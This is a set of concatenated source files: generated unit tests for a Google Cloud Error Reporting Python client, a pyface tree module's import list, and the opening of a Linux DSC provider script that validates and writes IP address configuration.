# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = report_errors_service.ReportErrorEventRequest()
request.project_name = 'project_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse())
await client.report_error_event(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'project_name=project_name/value',
) in kw['metadata']
def test_report_error_event_flattened():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = report_errors_service.ReportErrorEventResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.report_error_event(
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].project_name == 'project_name_value'
assert args[0].event == report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751))
def test_report_error_event_flattened_error():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.report_error_event(
report_errors_service.ReportErrorEventRequest(),
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
@pytest.mark.asyncio
async def test_report_error_event_flattened_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.report_error_event),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(report_errors_service.ReportErrorEventResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.report_error_event(
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0].project_name == 'project_name_value'
assert args[0].event == report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751))
@pytest.mark.asyncio
async def test_report_error_event_flattened_error_async():
client = ReportErrorsServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.report_error_event(
report_errors_service.ReportErrorEventRequest(),
project_name='project_name_value',
event=report_errors_service.ReportedErrorEvent(event_time=timestamp_pb2.Timestamp(seconds=751)),
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide scopes and a transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = ReportErrorsServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = ReportErrorsServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.ReportErrorsServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.ReportErrorsServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize("transport_class", [
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.ReportErrorsServiceGrpcTransport,
)
def test_report_errors_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.ReportErrorsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json"
)
def test_report_errors_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.ReportErrorsServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'report_error_event',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
@requires_google_auth_gte_1_25_0
def test_report_errors_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json",
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_base_transport_with_credentials_file_old_google_auth():
# Instantiate the base transport with a credentials file
with mock.patch.object(google.auth, 'load_credentials_from_file', autospec=True) as load_creds, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with("credentials.json", scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
def test_report_errors_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default', autospec=True) as adc, mock.patch('google.cloud.errorreporting_v1beta1.services.report_errors_service.transports.ReportErrorsServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.ReportErrorsServiceTransport()
adc.assert_called_once()
@requires_google_auth_gte_1_25_0
def test_report_errors_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReportErrorsServiceClient()
adc.assert_called_once_with(
scopes=None,
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id=None,
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_auth_adc_old_google_auth():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
ReportErrorsServiceClient()
adc.assert_called_once_with(
scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id=None,
)
@pytest.mark.parametrize(
"transport_class",
[
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_gte_1_25_0
def test_report_errors_service_transport_auth_adc(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default', autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus", scopes=["1", "2"])
adc.assert_called_once_with(
scopes=["1", "2"],
default_scopes=( 'https://www.googleapis.com/auth/cloud-platform',),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class",
[
transports.ReportErrorsServiceGrpcTransport,
transports.ReportErrorsServiceGrpcAsyncIOTransport,
],
)
@requires_google_auth_lt_1_25_0
def test_report_errors_service_transport_auth_adc_old_google_auth(transport_class):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class(quota_project_id="octopus")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
quota_project_id="octopus",
)
@pytest.mark.parametrize(
"transport_class,grpc_helpers",
[
(transports.ReportErrorsServiceGrpcTransport, grpc_helpers),
(transports.ReportErrorsServiceGrpcAsyncIOTransport, grpc_helpers_async)
],
)
def test_report_errors_service_transport_create_channel(transport_class, grpc_helpers):
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch.object(
grpc_helpers, "create_channel", autospec=True
) as create_channel:
creds = ga_credentials.AnonymousCredentials()
adc.return_value = (creds, None)
transport_class(
quota_project_id="octopus",
scopes=["1", "2"]
)
create_channel.assert_called_with(
"clouderrorreporting.googleapis.com:443",
credentials=creds,
credentials_file=None,
quota_project_id="octopus",
default_scopes=(
'https://www.googleapis.com/auth/cloud-platform',
),
scopes=["1", "2"],
default_host="clouderrorreporting.googleapis.com",
ssl_credentials=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_grpc_transport_client_cert_source_for_mtls(
transport_class
):
cred = ga_credentials.AnonymousCredentials()
# Check ssl_channel_credentials is used if provided.
with mock.patch.object(transport_class, "create_channel") as mock_create_channel:
mock_ssl_channel_creds = mock.Mock()
transport_class(
host="squid.clam.whelk",
credentials=cred,
ssl_channel_credentials=mock_ssl_channel_creds
)
mock_create_channel.assert_called_once_with(
"squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_channel_creds,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls
# is used.
with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()):
with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred:
transport_class(
credentials=cred,
client_cert_source_for_mtls=client_cert_source_callback
)
expected_cert, expected_key = client_cert_source_callback()
mock_ssl_cred.assert_called_once_with(
certificate_chain=expected_cert,
private_key=expected_key
)
def test_report_errors_service_host_no_port():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='clouderrorreporting.googleapis.com'),
)
assert client.transport._host == 'clouderrorreporting.googleapis.com:443'
def test_report_errors_service_host_with_port():
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='clouderrorreporting.googleapis.com:8000'),
)
assert client.transport._host == 'clouderrorreporting.googleapis.com:8000'
def test_report_errors_service_grpc_transport_channel():
channel = grpc.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.ReportErrorsServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
def test_report_errors_service_grpc_asyncio_transport_channel():
channel = aio.secure_channel('http://localhost/', grpc.local_channel_credentials())
# Check that channel is used if provided.
transport = transports.ReportErrorsServiceGrpcAsyncIOTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
    assert transport._ssl_channel_credentials is None
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
# Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are
# removed from grpc/grpc_asyncio transport constructor.
@pytest.mark.parametrize("transport_class", [transports.ReportErrorsServiceGrpcTransport, transports.ReportErrorsServiceGrpcAsyncIOTransport])
def test_report_errors_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel") as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=None,
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_common_billing_account_path():
billing_account = "squid"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = ReportErrorsServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "clam",
}
path = ReportErrorsServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_billing_account_path(path)
assert expected == actual
def test_common_folder_path():
folder = "whelk"
expected = "folders/{folder}".format(folder=folder, )
actual = ReportErrorsServiceClient.common_folder_path(folder)
assert expected == actual
def test_parse_common_folder_path():
expected = {
"folder": "octopus",
}
path = ReportErrorsServiceClient.common_folder_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_folder_path(path)
assert expected == actual
def test_common_organization_path():
organization = "oyster"
expected = "organizations/{organization}".format(organization=organization, )
actual = ReportErrorsServiceClient.common_organization_path(organization)
assert expected == actual
def test_parse_common_organization_path():
expected = {
"organization": "nudibranch",
}
path = ReportErrorsServiceClient.common_organization_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_organization_path(path)
assert expected == actual
def test_common_project_path():
project = "cuttlefish"
expected = "projects/{project}".format(project=project, )
actual = ReportErrorsServiceClient.common_project_path(project)
assert expected == actual
def test_parse_common_project_path():
expected = {
"project": "mussel",
}
path = ReportErrorsServiceClient.common_project_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_project_path(path)
assert expected == actual
def test_common_location_path():
project = "winkle"
location = "nautilus"
expected = "projects/{project}/locations/{location}".format(project=project, location=location, )
actual = ReportErrorsServiceClient.common_location_path(project, location)
assert expected == actual
def test_parse_common_location_path():
expected = {
"project": "scallop",
"location": "abalone",
}
path = ReportErrorsServiceClient.common_location_path(**expected)
# Check that the path construction is reversible.
actual = ReportErrorsServiceClient.parse_common_location_path(path)
assert expected == actual
def test_client_withDEFAULT_CLIENT_INFO():
client_info = gapic_v1.client_info.ClientInfo()
with mock.patch.object(transports.ReportErrorsServiceTransport, '_prep_wrapped_messages') as prep:
client = ReportErrorsServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
with mock.patch.object(transports.ReportErrorsServiceTransport, '_prep_wrapped_messages') as prep:
transport_class = ReportErrorsServiceClient.get_transport_class()
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials(),
client_info=client_info,
)
prep.assert_called_once_with(client_info)
| apache-2.0 | -5,023,281,741,818,850,000 | 41.550218 | 257 | 0.680398 | false |
geggo/pyface | pyface/tree/api.py | 1 | 1198 | #------------------------------------------------------------------------------
# Copyright (c) 2005-2011, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
from __future__ import absolute_import
from .node_event import NodeEvent
from .node_monitor import NodeMonitor
from .node_manager import NodeManager
from .node_tree import NodeTree
from .node_tree_model import NodeTreeModel
from .node_type import NodeType
from .trait_dict_node_type import TraitDictNodeType
from .trait_list_node_type import TraitListNodeType
from .tree_model import TreeModel
from traits.etsconfig.api import ETSConfig
if ETSConfig.toolkit == 'wx':
# Tree has not yet been ported to qt
from .tree import Tree
del ETSConfig
| bsd-3-clause | 3,699,413,282,578,178,600 | 36.4375 | 79 | 0.682805 | false |
MSFTOSSMgmt/WPSDSCLinux | Providers/Scripts/2.4x-2.5x/Scripts/nxIPAddress.py | 2 | 31170 | #!/usr/bin/env python
#============================================================================
# Copyright (c) Microsoft Corporation. All rights reserved. See license.txt for license information.
#============================================================================
import os
import sys
import tempfile
import re
import platform
import imp
import socket
protocol=imp.load_source('protocol','../protocol.py')
"""
MOF:
[ClassVersion("1.0.0"), FriendlyName("nxIPAddress")]
class MSFT_nxIPAddress : OMI_BaseResource
{
[write] string IPAddress;
[Key] string InterfaceName;
[write,ValueMap{"Automatic", "Static"},Values{"Automatic", "Static"}] string BootProtocol;
[write] string DefaultGateway;
[write,ValueMap{"Present", "Absent"}, Values{"Present", "Absent"}] string Ensure;
[write] integer PrefixLength;
[Key,write,ValueMap{"IPv4", "IPv6"},Values{"IPv4", "IPv6"}] string AddressFamily;
};
"""
def Print(s,file=sys.stdout):
file.write(s+'\n')
def ValidateAddresses(IPAddress,AddressFamily,PrefixLength):
if 'IPv4' in AddressFamily:
ptype=socket.AF_INET
elif 'IPv6' in AddressFamily:
ptype=socket.AF_INET6
else:
return False
try:
socket.inet_pton(ptype,IPAddress)
except:
Print('Error: IPAddress "'+IPAddress+'" is invalid.',file=sys.stderr)
return False
if type(PrefixLength) == int or type(PrefixLength) == long :
if 'IPv4' in AddressFamily and ( PrefixLength < 0 or PrefixLength > 32) :
Print('Error: PrefixLength "'+ str(PrefixLength) +'" is invalid. Values are 0-32.',file=sys.stderr)
return False
if 'IPv6' in AddressFamily and ( PrefixLength < 0 or PrefixLength > 128) :
Print('Error: PrefixLength "'+ str(PrefixLength) +'" is invalid. Values are 0-128.',file=sys.stderr)
return False
return True
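# Illustrative behaviour of ValidateAddresses (example values only):
#   ValidateAddresses('192.168.1.20', 'IPv4', 24) -> True
#   ValidateAddresses('2001:db8::1', 'IPv6', 64)  -> True
#   ValidateAddresses('192.168.1.20', 'IPv4', 40) -> False (prefix out of range)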
def bitNetmaskConversion(PrefixLength):
if PrefixLength == '':
return ''
if type(PrefixLength) != long and type(PrefixLength) != int :
N = int(PrefixLength)
else :
N = PrefixLength
M = int(N / 8) #number of 255 sections (full octets)
MASK = 255
netmaskIP = ""
count = 0
while count < M:
netmaskIP = netmaskIP + "255."
count += 1
if N % 8 != 0:
netmaskIP += str((MASK << (8 - N%8)) & MASK) + "."
count += 1
while count < 4:
netmaskIP = netmaskIP + "0."
count += 1
if netmaskIP[-1] == ".":
netmaskIP = netmaskIP[:-1]
return netmaskIP
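# Illustrative examples (prefix length to dotted netmask):
#   bitNetmaskConversion(24) -> '255.255.255.0'
#   bitNetmaskConversion(20) -> '255.255.240.0'
#   bitNetmaskConversion('') -> ''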
def netmaskBitConversion(netmask):
if netmask==None or netmask=='' :
return 0
arrTmp = netmask.strip("'")
arr = arrTmp.split(".")
sumT = 0
for i in arr:
i = int(i)
if i == 255:
sumT += 8
else:
j = 0
while j < 8:
sumT += (i >> j) & 1
j+=1
return sumT
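# Illustrative examples (dotted netmask back to prefix length):
#   netmaskBitConversion('255.255.255.0') -> 24
#   netmaskBitConversion('255.255.240.0') -> 20
#   netmaskBitConversion(None)            -> 0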
def init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
if PrefixLength == None:
PrefixLength=''
if BootProtocol == None or len(BootProtocol)<1:
BootProtocol='Automatic'
else :
BootProtocol=BootProtocol[0].upper()+BootProtocol[1:].lower()
if Ensure == None or len(Ensure)<1:
Ensure='Present'
else :
Ensure=Ensure[0].upper()+Ensure[1:].lower()
if AddressFamily == None or len(AddressFamily)<1:
AddressFamily='IPv4'
else :
AddressFamily=AddressFamily[0].upper()+AddressFamily[1].upper()+AddressFamily[2].lower()+AddressFamily[3:]
if IPAddress == None:
IPAddress=''
if len(IPAddress)>0:
if ValidateAddresses(IPAddress,AddressFamily,PrefixLength) == False:
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
elif BootProtocol != 'Automatic' and Ensure == 'Present':
        Print('ERROR: BootProtocol != Automatic. IPAddress is required.',file=sys.stderr)
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
if DefaultGateway == None:
DefaultGateway=''
if len(DefaultGateway) > 0 and ValidateAddresses(DefaultGateway,AddressFamily,'') == False:
return False,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
return True,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily
def Set_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1]
MyDistro=GetMyDistro()
retval = MyDistro.Set(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
return retval
def Test_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1]
MyDistro=GetMyDistro()
return MyDistro.Test(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
def Get_Marshall(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
arg_names=list(locals().keys())
ret,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily = \
init_vars(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
if ret is False :
return [-1,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily]
retval = 0
MyDistro=GetMyDistro()
(retval, IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily) = MyDistro.Get(IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily)
Ensure = protocol.MI_String(Ensure.encode("utf-8"))
IPAddress = protocol.MI_String(IPAddress.encode("utf-8"))
AddressFamily= protocol.MI_String(AddressFamily.encode("utf-8"))
InterfaceName = protocol.MI_String(InterfaceName.encode("utf-8"))
BootProtocol = protocol.MI_String(BootProtocol.encode("utf-8"))
DefaultGateway = protocol.MI_String(DefaultGateway.encode("utf-8"))
if type(PrefixLength) == int or type(PrefixLength) == long :
PrefixLength=protocol.MI_Uint32(PrefixLength)
else:
PrefixLength=protocol.MI_Uint32(int(PrefixLength))
retd={}
ld=locals()
for k in arg_names :
retd[k]=ld[k]
return retval, retd
def ReplaceFileContentsAtomic(filepath, contents):
"""
Write 'contents' to 'filepath' by creating a temp file, and replacing original.
"""
handle, temp = tempfile.mkstemp(dir = os.path.dirname(filepath))
if type(contents) == str :
contents=contents.encode('latin-1')
try:
os.write(handle, contents)
except IOError, e:
        Print('ReplaceFileContentsAtomic: Writing to file ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
return None
os.close(handle)
try:
os.rename(temp, filepath)
return None
except IOError, e:
        Print('ReplaceFileContentsAtomic: Renaming ' + temp + ' to ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
try:
os.remove(filepath)
except IOError, e:
            Print('ReplaceFileContentsAtomic: Removing ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
try:
os.rename(temp,filepath)
except IOError, e:
            Print('ReplaceFileContentsAtomic: Renaming ' + temp + ' to ' + filepath + ' Exception is ' + str(e),file=sys.stderr)
return 1
return 0
def GetMyDistro(dist_class_name=''):
"""
Return MyDistro object.
NOTE: Logging is not initialized at this point.
"""
if dist_class_name == '':
if 'Linux' in platform.system():
Distro=platform.dist()[0]
else : # I know this is not Linux!
if 'FreeBSD' in platform.system():
Distro=platform.system()
Distro=Distro.strip('"')
Distro=Distro.strip(' ')
dist_class_name=Distro+'Distro'
else:
Distro=dist_class_name
if not globals().has_key(dist_class_name):
Print(Distro+' is not a supported distribution.')
return None
return globals()[dist_class_name]() # the distro class inside this module.
class AbstractDistro(object):
def __init__(self):
self.gateway_file='/etc/sysconfig/network'
self.gateway_prefix=''
self.ifcfg_prefix='/etc/sysconfig/network-scripts/ifcfg-'
def init_re_dict(self,src_dict):
re_dict=dict()
for k in src_dict:
re_dict[k]=re.compile(r'\s*'+k+'.*')
return re_dict
def init_src_dicts(self,IPAddress,InterfaceName,BootProtocol,DefaultGateway,Ensure,PrefixLength,AddressFamily):
self.gateway_dict=dict()
self.ifcfg_v4_dict=dict()
self.ifcfg_v4_dict['ONBOOT=']='yes'
self.ifcfg_v4_dict['DEVICE=']=InterfaceName
if BootProtocol.lower() == 'static':
self.ifcfg_v4_dict['BOOTPROTO=']='none'
else:
self.ifcfg_v4_dict['BOOTPROTO=']='dhcp'
self.ifcfg_v4_dict['DHCPCLASS=']=''
self.ifcfg_v4_dict['IPADDR=']=IPAddress
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v4_dict['NETMASK=']=bitNetmaskConversion(PrefixLength)
else:
self.ifcfg_v4_dict['NETMASK=']=''
self.ifcfg_v6_dict=dict()
self.ifcfg_v6_dict['ONBOOT=']='yes'
self.ifcfg_v6_dict['DEVICE=']=InterfaceName
if BootProtocol.lower() == 'static':
self.ifcfg_v6_dict['BOOTPROTO=']='none'
else:
self.ifcfg_v6_dict['BOOTPROTO=']='dhcp'
self.ifcfg_v6_dict['DHCPCLASS=']=''
if BootProtocol.lower() == 'static':
self.ifcfg_v6_dict['IPV6INIT=']='yes'
self.ifcfg_v6_dict['IPV6_AUTOCONF=']='no'
else :
self.ifcfg_v6_dict['IPV6INIT=']='yes'
self.ifcfg_v6_dict['IPV6_AUTOCONF=']='yes'
if PrefixLength != 0 and PrefixLength != '':
self.ifcfg_v6_dict['IPV6ADDR=']=IPAddress+'/'+str(PrefixLength)
else:
self.ifcfg_v6_dict['IPV6ADDR=']=IPAddress
self.gateway_dict['GATEWAY=']=DefaultGateway
if AddressFamily == 'IPv4':
self.ifcfg_dict=self.ifcfg_v4_dict
self.addr_key='IPADDR='
else :
self.ifcfg_dict=self.ifcfg_v6_dict
self.addr_key='IPV6ADDR='
self.gateway_dict['NETWORKING_IPV6=']='yes'
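    # Illustrative only: with BootProtocol='Static', IPAddress='192.168.1.20',
    # PrefixLength=24 and InterfaceName='eth0', the IPv4 dictionaries above
    # describe an ifcfg-eth0 file roughly like:
    #   ONBOOT=yes
    #   DEVICE=eth0
    #   BOOTPROTO=none
    #   IPADDR=192.168.1.20
    #   NETMASK=255.255.255.0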
